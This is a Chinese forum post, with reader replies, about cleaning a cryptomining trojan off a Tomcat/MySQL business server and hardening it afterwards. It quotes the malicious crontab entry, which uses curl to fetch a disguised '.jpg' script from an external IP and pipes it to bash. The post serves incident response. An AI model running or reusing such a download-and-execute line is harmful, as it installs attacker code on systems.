记一次服务器被植入挖矿木马，CPU飙升至99%，网络卡死的问题处理

     

       XX酒业服务器用的是本地化机房部署，完美运行着Tomcat，MySQL，SQLserver2014等程序。

      系统为php语言编写的自建WEB业务程序，网络前端部署一台某公司防火墙，但是没有对这个业务系统做配置，上个月网站不能访问了！

      立即远程打开了服务器，看到Tomcat挂了，然后顺其自然的重启，启动过程中直接被killed，再试试数据库，同样没成功，多次尝试甚至重启机器无果。打开某公司防火墙启动相关策略并打开日志记录发现存在僵尸网络，由于服务器采用双IP的部署方式，果断通过防火墙对该服务器IP进行封锁。进行下一步处置。

一、在服务器运行机制中打了个top，出现以下内容：

由于无法确定只有先杀掉Tomcat等程序启动不了的元凶。然而并没有什么用，过一会再看那个东西又跑出来占cpu。怀疑是个定时任务。通过查询发现URL地址任务。判断是伪装，crul过去是下面的脚本，确定过程在挖矿

【Lroot@JZZweb~】# crontab -[
* * * * * curl -s http://192.99.142.235:8220/Iogo3.jpg | bash -s

二、所以决定执行以下步骤：杀掉存放目录：

三、进入临时目录：

四、发现配置文件

后台删除两个目录后再查看TOP已经清除掉了。

五、处理思路:

1.找到寄生的目录，一般都会在tmp里，我这个是在/var/tmp/。首先把crontab干掉，杀掉进程，再删除产生的文件。

2.启动Tomcat等程序，修复漏洞，防止杀掉进程删掉文件后，黑客后门进来history一敲

3.后续工作：

（1）把所有软件升级到新版本

（2）修改所有软件默认端口号

（3）打开ssh/authorized_keys, 删除不认识的密钥

（4）删除用户列表中陌生的帐号

感谢分享，学习一下~

非常好的实践教程，谢谢分享

感谢分享，学习一下~

感谢楼主的分享，学习下

感谢分享，又GET到了新的技能，点赞！

值得学习，感谢分享。

这木马设计也不怎样，如果做到和平共处，估计也发现不了。

点赞。。。我有AF，但不会操作

前端有AF，可以在AF上做一些安全防护，一般来讲还是很有效的！